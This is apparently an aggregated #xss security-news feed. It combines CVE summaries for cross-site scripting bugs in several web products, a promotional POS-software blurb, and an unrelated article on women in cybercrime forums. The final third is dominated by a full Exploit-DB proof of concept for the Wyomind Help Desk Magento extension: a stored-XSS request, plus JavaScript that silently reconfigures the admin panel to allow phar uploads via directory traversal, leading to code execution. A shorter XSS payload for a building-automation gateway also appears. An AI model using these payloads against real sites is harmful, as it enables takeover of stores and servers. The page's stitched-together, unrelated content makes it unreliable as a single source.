A cross-site scripting (XSS) vulnerability in /admin/navbar.php of Online Pizza Ordering System 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the page parameter.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2023-27211: CVE/xss in navbar.php .md at main · xiumulty/CVE

A cross-site scripting (XSS) vulnerability in /php-opos/login.php of Online Pizza Ordering System 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the redirect parameter.

CVE-2023-27208: CVE/xss in login.php.md at main · xiumulty/CVE

A cross-site scripting (XSS) vulnerability in /kruxton/navbar.php of Best POS Management System 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the page parameter.

Submitted by mayuri\_k on Friday, February 10, 2023 - 01:54.

For any retail business, managing point of sale (POS) transactions efficiently is critical to success. Many business tasks can be automated with a POS system, from tracking sales to processing payments to generating reports. Businesses of all sizes can benefit from a POS management system built with PHP. Server-side scripting languages like PHP are really popular for web development. A POS management system can be built easily with this open-source, easy-to-learn software.

With the help of a PHP Point-of-Sale Management System, merchants can keep a more accurate record of sales and inventory. The software is designed to provide comprehensive solutions for businesses of all sizes, including small retail stores as well as large restaurant chains. Businesses can streamline their operations, reduce costs, and improve customer satisfaction by utilizing POS software solutions. 

**How to Install POS Management system in php :**

Businesses can improve their operations by using a PHP POS Management System in five key areas: retail management, ecommerce, cloud-based systems, easy-to-use systems, and customer service. Business owners may be able to manage their inventory more efficiently and reduce manual costs with the assistance of POS systems. In addition, it automates a number of tasks, such as order processing and shipping, which streamlines the operation of businesses. Businesses can improve their efficiency and profitability through the use of a PHP Point of Sale Management System.

Here are some of the benefits of using a POS Management System developed using PHP:

1.  An automated system is more accurate than a manual system because it is less prone to errors. Sales transactions can be made more accurate by reducing the number of errors that occur during transaction processing.
2.  Increased efficiency: Businesses are able to serve more customers in a shorter period of time with the aid of a POS Management System.
3.  Real-time data: Businesses can make informed decisions about inventory levels and product orders by using a PHP-based POS Management System.
4.  Easy reporting: Reports are produced by the system regarding sales, inventory, and customer data, allowing businesses to analyze their performance and make informed decisions based on this data.
5.  Better customer experience: When a POS Management System is used in a business, customers are likely to experience a better shopping experience due to a modern, user-friendly interface and quick transaction processing.
6.  Increased security: Information related to sensitive business and customer information can be protected using features such as secure payment processing, inventory tracking, and data encryption.
7.  Integration capabilities: PHP-based point of sale systems can easily be integrated with other software applications, such as accounting, customer relationship management, and e-commerce systems.

An important characteristic of PHP is its flexibility, which allows businesses to easily customize the language in order to meet their specific needs. In this way, businesses are able to create POS Management Systems that are tailored to their particular needs.

A cost-effective programming language: PHP is an open-source programming language and is free to download. POS Management Systems can be developed and maintained more efficiently this way.

Additionally, POS Management Systems written in PHP are very versatile and can be used by a wide range of businesses, from small coffee shops to large restaurants. There will be future updates to the point of sale system that will include features such as real-time inventory tracking, loyalty programs, discounts and promotions management, employee management, and more.  
 

**How to Run this fees management system project in PHP source code :**

1.  Download source code (zip file) of pos management system project with SQL file.
2.  Extract the file of the project folder (zip file) related to the kruxton
3.  Copy project folder i.e source code files to htdocs
4.  open localhost/phpmyadmin and create a database (remember PHP version must be a minimum of 7.1)
5.  Now import the database of the SQL file
6.  Open source code files and check database name is proper or not.
7.  Now open the admin panel and log in with provided credentials.
    
    **I provide high-quality software projects, thesis writing services, website development services, and web application development. If there is any need you can contact me by email.**
    

*   3501 views

CVE-2023-27206: Best pos management system in php

Real Time Automation 460MCBS version 5.2.14 suffers from a cross site scripting vulnerability.

    Exploit Title:  Real Time Automation 460MCBS Cross Site Scripting (XSS)Date: 2023-03-09Exploit Author: Yehia ElghalyVendor Homepage: https://www.rtautomation.com/Software Link: https://www.rtautomation.com/product/460mcbs/Version: Revision 5.2.14Tested on: Real Time Automation CVE: N/ASummary: The Real Time Automation  460MCBS moves data between up to 32 Modbus TCP Servers and a BACnet/IP Building Automation System (BAS). It’s a perfect tool to tie Modbus TCP power meters, boilers, chillers and other devices into your BACnet/IP Building Automation SystemDescription: The attacker can able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.: XSS found on when insert a payload after(/)Payload: ?c12yy<script>alert('XSSYF')</script>p1ax8=1[Affected Component](/)

Real Time Automation 460MCBS 5.2.14 Cross Site Scripting

Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 10.5.19.

**Cross-site Scripting (XSS) in pimcore/pimcore**

Moderate severity GitHub Reviewed Published Mar 9, 2023 to the GitHub Advisory Database • Updated Mar 15, 2023

GHSA-8jv7-vwrc-mv4g: Cross-site Scripting (XSS) in pimcore/pimcore

CVE-2023-1286

By Habiba Rashid
It turns out that the number of women on the darker side of cybersecurity is increasing, and these stats will shock you.
This is a post from HackRead.com Read the original post: Gender Diversity in Cybercrime Forums: Women Users on the Rise

****According to the report, 36% of users at Hackforums were likely women, based on their use of language, and 30% of XSS forum users, a Russian language cybercrime forum, were reportedly women.****

In recent years, there has been a shift toward increased gender equality in **underground cybercriminal forums**. This stands in stark contrast to the more male-dominated cybersecurity industry, where women continue to face significant barriers to entry and advancement.

A recently published **study** by Trend Micro pushes forward a similar finding wherein at least 30%, if not more, of cybercriminal forum users, are women. Although the methodology used makes the results of the study somewhat unreliable, the report itself recognizes this. 

Trend Micro inspected five English-language cybercrime forums: Sinister, Cracked, Breached, Hackforums, and **(now defunct and seized) Raidforum**, as well as five Russian-language sites: XSS, Exploit, Vavilon, BHF, and WWH-Club.

Since these sites are frequented by largely anonymous users, tools such as Semrush and uClassify’s Gender Analyzer V5 were used to estimate the number of female users.

According to the report, 36% of users at **Hackforums** were likely women, based on their use of language, and 30% of XSS forum users were reportedly women, based on the same analysis. At first glance, these numbers indicate that cybercriminal forums are more meritocratic than the white hat world, but this article will delve deeper to understand the reasons behind this difference. 

One reason for the gender diversity in cybercriminal forums is that these groups are often more decentralized and less hierarchical than traditional workplaces. This can make it easier for women to participate and contribute their skills without **fear of discrimination or harassment**.

It is important to understand that these forums have traditionally been male-dominated spaces where men exchange information, tools, and services related to cybercrime.

However, with the increased diversity in the cybersecurity industry over the years, more women have entered the field. As a result, there are now more women who possess the skills and knowledge necessary to participate in these forums.

But why is gender diversity not growing at an equal rate in the cybersecurity workforce? The reasons for this gender gap are complex and multifaceted. Women face a range of barriers to entry, including unconscious bias, stereotypes, and a lack of female role models and mentors in the industry. Additionally, the highly technical and male-dominated culture of cybersecurity can create a challenging environment for women to thrive.

According to a **2022 report** from Cybersecurity Ventures, women make up just 25% of the cybersecurity workforce, with even lower numbers in leadership roles. This gender gap is especially concerning, given the increasing demand for cybersecurity professionals and the potential consequences of a lack of diversity in this field.

One of the most significant reasons for the increase in the number of female users on cybercriminal forums is anonymity, which can be empowering for women who may face discrimination or harassment in the workplace.

In an **underground cybercriminal forum**, participants are judged solely on their skills and contributions, rather than their gender or other personal characteristics. This creates a level playing field where women can demonstrate their expertise and gain respect from their peers. As a result, women who seek out a gender-anonymous space have been increasingly drawn to these forums.

Lastly, the **rise of cryptocurrencies** has made it easier for women to participate in these forums. Traditionally, cybercriminals have used traditional payment methods, such as wire transfers or PayPal, to exchange money for tools and services.

Ilya Lichtenstein and his wife, Heather Morgan, were arrested in February 2022 and charged for their involvement in money laundering of funds stolen in the Bitfinex cryptocurrency hack of 2016.

Suzette Kugler, a 59-year-old US woman, was arrested for hacking the internal network of her employer, PenAir.

Valerie Gignac, a 27-year-old Canadian woman, was arrested in April 2015 for spying on people through webcams, harassing victims, and even owning a famous hacking forum with more than 35,000 members.

Eighteen-year-old Michaela Gabriella King carried out crippling DDoS attacks on her school system.

However, these methods are often difficult for women to use, as they may not have access to a bank account or a credit card. Cryptocurrencies, on the other hand, can be easily obtained and used anonymously, making it easier for women to participate in these forums.

What all of this proves is that women are not absent from the cybersecurity industry, but rather likely to be on the wrong side of it. Efforts to address gender inequality in cybersecurity are underway, with initiatives such as Women in Cybersecurity (WiCyS) and the National Cyber Security Centre’s CyberFirst Girls competition aimed at encouraging more women to pursue careers in this field.

However, progress has been slow, and it will likely take a concerted effort from the industry as a whole to truly move the needle on gender diversity. By addressing the underlying barriers to entry and fostering a more inclusive culture, we can create a more equitable and effective **cybersecurity workforce** where women with a passion for cybersecurity become a valuable part of the industry. 

1.  **Woman arrested for spying on people via webcams**
2.  **Woman hacked, leaked private pics of Selena Gomez**
3.  **Woman hacked airline network, busted through VPN logs**
4.  **Female DDoS attacker charged with crippling school system**
5.  **Husband and wife ransomware operators arrested in Ukraine**

Gender Diversity in Cybercrime Forums: Women Users on the Rise

A issue has been discovered in GitLab CE/EE affecting all versions from 15.3 prior to 15.7.8, version 15.8 prior to 15.8.4, and version 15.9 prior to 15.9.2 A cross-site scripting vulnerability was found in the title field of work items that allowed attackers to perform arbitrary actions on behalf of victims at client side.

Skip to content

GitLab

Next

*   *   GitLab: the DevOps platform
    *   Explore GitLab
    *   Install GitLab
    *   How GitLab compares
    *   Get started
    *   GitLab docs
    *   GitLab Learn
    
*   Pricing
*   Talk to an expert

*   /
    
*   

*   Help
    
    *   Help
    *   Support
    *   Community forum
    
    *   Submit feedback
    *   Contribute to GitLab
    
*   *   
    
    Projects Groups Snippets
    
*   Register
*   Sign in

*   GitLab.org
*   cves
*   Repository

*   cves
*   2022
*   **CVE-2022-4007.json**

Find file BlameHistoryPermalink

*   Publishing 0 updated advisories and 1 new advisories · 74b7615b
    
    🤖 GitLab Bot 🤖 authored Mar 04, 2023
    
    74b7615b

CVE-2022-4007: 2022/CVE-2022-4007.json · master · GitLab.org / cves · GitLab

Directory Traversal vulnerability in Wyomind Help Desk Magento 2 extension v.1.3.6 and before fixed in v.1.3.7 allows attacker to execute arbitrary code via the file attachment directory setting.

    # Exploit Title: Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) 
    # Date: 2021-07-07
    # Exploit Author: Patrik Lantz
    # Vendor Homepage: https://www.wyomind.com/magento2/helpdesk-magento-2.html
    # Version: <= 1.3.6
    # Tested on: Ubuntu 18.04-20.04, Apache, PHP 7.2, Magento 2
    
    
    The Mangento 2 Help Desk extension from Wyomind up to and including version 1.3.6 is vunerable to stored XSS, directory traversal and  unrestricted upload of a dangerous file type. These vulnerabilites combined could lead to code execution.
    
    A XSS payload can be sent via the ticket message from the front-end in the 'Support - My tickets' section. 
    The payload is triggered when an administrator views the ticket in the Magento 2 backend. The following request enable
    the delivery of the XSS payload:
    
    POST /helpdesk/customer/ticket_save/ HTTP/1.1
    Host: <redacted>
    Content-Type: multipart/form-data; boundary=---------------------------243970849510445067673127196635
    Content-Length: 683
    Origin: https://<redacted>
    Connection: close
    Referer: https://<redacted>/helpdesk/customer/ticket_view/
    Cookie: <redacted>
    Upgrade-Insecure-Requests: 1
    
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="form_key"
    
    <redacted>
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="object"
    
    Hello
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="message_cc"
    
    
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="content"
    
    <p><script>alert(1)</script></p>
    -----------------------------243970849510445067673127196635
    Content-Disposition: form-data; name="hideit"
    
    
    -----------------------------243970849510445067673127196635--
    
    
    
    The following XSS payload shown below can be used to trigger 
    
    1) Enabling file attachments in ticket messages
    2) Adding 'phar' to allowed file extensions
    3) Setting the attachment directory to 'helpdesk/files/../../../pub'
    
    
    <script>
    function successListener(e) {    
    	var doc = e.target.response
    	var action=doc.getElementById('config-edit-form').action;
    	
    	function submitRequest()
    	{
    	var formKey = FORM_KEY;
    	var xhr = new XMLHttpRequest();
    	xhr.open("POST", action, true);
    	xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------14303502862141221692667966053");
    	xhr.withCredentials = true;
    	var body = "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"form_key\"\r\n" + 
    	  "\r\n" + 
    	  formKey + "\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_license]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_general]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][log][value]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][default_email][value]\"\r\n" + 
    	  "\r\n" + 
    	  "\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][default_status][value]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][pending_status][value]\"\r\n" + 
    	  "\r\n" + 
    	  "2\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][closed_status][value]\"\r\n" + 
    	  "\r\n" + 
    	  "3\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[general][fields][ticket_prefix][value]\"\r\n" + 
    	  "\r\n" + 
    	  "10000\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][fields][menu_label][value]\"\r\n" + 
    	  "\r\n" + 
    	  "Support - My Tickets\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][fields][top_link_enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][fields][attachments][value]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend_attachments_settings]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_extension][value]\"\r\n" + 
    	  "\r\n" + 
    	  "jpeg,gif,png,pdf,phar\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_directory_path][value]\"\r\n" + 
    	  "\r\n" + 
    	  "helpdesk/files/../../../pub\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_upload_max_filesize][value]\"\r\n" + 
    	  "\r\n" + 
    	  "2M\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_post_max_size][value]\"\r\n" + 
    	  "\r\n" + 
    	  "4M\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails]\"\r\n" + 
    	  "\r\n" + 
    	  "1\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_customer_settings]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_content][value]\"\r\n" + 
    	  "\r\n" + 
    	  "Dear {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
    	  "Your message has been sent to the support team.\r\n" + 
    	  "Here is the message content:\x3cbr/\x3e\r\n" + 
    	  "\"{{message}}\" \x3cbr/\x3e\x3cbr/\x3e\r\n" + 
    	  "Kind Regards,\r\n" + 
    	  "The Support Team.\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_content][value]\"\r\n" + 
    	  "\r\n" + 
    	  "Hello {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
    	  "Your ticket \"{{ticket_object}}\" (#{{prefixed_id}}) has been updated.\r\n" + 
    	  "Please login to your account via this link in order to see the new message: {{customer_account_link}}\x3cbr/\x3e\x3cbr/\x3e\r\n" + 
    	  "Regards,\r\n" + 
    	  "The Support Team.\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_support_team_settings]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_enabled][value]\"\r\n" + 
    	  "\r\n" + 
    	  "0\r\n" + 
    	  "-----------------------------14303502862141221692667966053\r\n" + 
    	  "Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_content][value]\"\r\n" + 
    	  "\r\n" + 
    	  "You received a new message from a customer.\r\n" + 
    	  "-----------------------------14303502862141221692667966053--\r\n";
    	var aBody = new Uint8Array(body.length);
    	for (var i = 0; i < aBody.length; i++)
    	aBody[i] = body.charCodeAt(i); 
    	xhr.send(new Blob([aBody]));
    	}
    	submitRequest();
    }
    	
    var request = new XMLHttpRequest();  
    request.onload = successListener;    
    request.responseType = 'document';
    request.open('GET', document.querySelector('[data-ui-id="menu-wyomind-helpdesk-configuration"]').querySelector('a').href, true);  
    request.send();
    </script> 
    
    After the XSS payload is executed, it is possible to upload a phar file by attaching files to ticket messages. Upon successful upload, the uploaded files can be requested to trigger the execution of it by requesting
    
    https://[HOSTNAME]/<ticketId>/<messageId>/filename.phar 
    
    ticketId and messageId can be identified after sending the ticket message with the attached phar file. The ticketId is visible in the 
    URL, for example: 
    
    https://[HOSTNAME]/helpdesk/customer/ticket_view/ticket_id/7/
    
    and the messageId can be identified by hovering over the uploaded file link which will be similar to 
    
    https://[HOSTNAME]/helpdesk/customer/message_downloadAttachment/message/40/file/filename.phar
    
    in this case, the messageId is 40.

CVE-2021-33353: Offensive Security’s Exploit Database Archive

A vulnerability, which was classified as problematic, has been found in IBOS up to 4.5.5. Affected by this issue is some unknown functionality of the file mobil/index.php. The manipulation of the argument accesstoken leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-222608.

Tag

#xss